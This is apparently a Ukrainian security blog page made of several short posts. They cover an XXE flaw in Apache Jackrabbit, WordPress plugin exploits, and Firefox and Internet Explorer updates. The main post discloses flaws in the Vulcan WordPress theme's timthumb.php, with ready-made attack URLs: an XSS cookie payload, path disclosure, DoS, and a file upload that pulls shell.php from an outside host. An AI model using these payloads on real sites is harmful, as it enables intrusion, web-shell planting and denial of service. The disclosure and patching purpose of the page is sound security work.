XXE уразливість в Apache Jackrabbit
20:07 04.07.2015Виявлена XML External Entity (XXE) уразливість в Apache Jackrabbit.
Уразливі версії: Apache Jackrabbit 2.10.
XXE через запит WebDAV.
- Jackrabbit WebDAV XXE vulnerability (деталі)
Виявлена XML External Entity (XXE) уразливість в Apache Jackrabbit.
Уразливі версії: Apache Jackrabbit 2.10.
XXE через запит WebDAV.
В даній добірці експлоіти в веб додатках:
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в WordPress 4.0 та в плагінах Html5 Mp3 Player, Sexy Squeeze Pages, Ad-Manager, CM Download Manager. Для котрих з’явилися експлоіти.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.
В даній добірці уразливості в веб додатках:
Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Vulcan для WordPress. Ці уразливості аналогічні тим, що я знайшов в темах для WP ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні).
XSS (WASC-08) (в старих версіях TimThumb):
http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure (WASC-13):
http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1
Abuse of Functionality (WASC-42):
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)
DoS (WASC-10):
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)
Arbitrary File Upload (WASC-31) (в старих версіях TimThumb):
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php
Full path disclosure (WASC-13):
http://site/wp-content/themes/vulcan/
Окрім index.php також можливі FPD в інших php-файлах в цій темі.
Уразливі всі версії теми Vulcan для WordPress (в останніх версіях виправлені лише уразливості в TimThumb, але все ще є FPD в інших php-файлах).
У версіях TimThumb до 2.8, де виправлена XSS, наявні всі інші уразливості. А починаючи з версії 2.8 виправлені всі уразливості. Але дірки AoF і DoS виправлені шляхом заборони зовнішніх хостів по замовчуванню. Якщо змінити налаштування (дозволити окремі чи всі зовнішні хости), що програма дозволяє, то знову можна буде проводити атаки на інші сайти. На деяких сайтах не оновлена версія TimThumb в темі, але вони захищаються WAF (як ModSecurity). Зазначу, що WAF не захистить від FPD дірок в цій темі та TimThumb, а в деяких випадках не захистить від AoF і DoS.
У травні, 14.05.2015, вийшов Mozilla Firefox 38.0.1. Нова версія браузера вийшла через 2 дні після виходу Firefox 38.
Це секюріті та багфікс випуск в якому виправлені баги, а також вибивання браузера. Мозіла не зарахувала цей crash до уразливостей, а до багів, як вона це дуже часто робить.
А у червні, 02.06.2015, вийшов Mozilla Firefox 38.0.5. Це коригувальний випуск в якому виправлені баги та доданий новий функціонал (Reader View, спільний доступ до вікна чи вкладки у клієнті Hello, інтеграція сервісу Pocket).
Виявлені численні уразливості безпеки в Microsoft Internet Explorer.
Уразливі продукти: Microsoft Internet Explorer 6, 7, 8, 9, 10, 11 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server, Windows 8.1.
Численні пошкодження пам’яті.
В даній добірці експлоіти в веб додатках: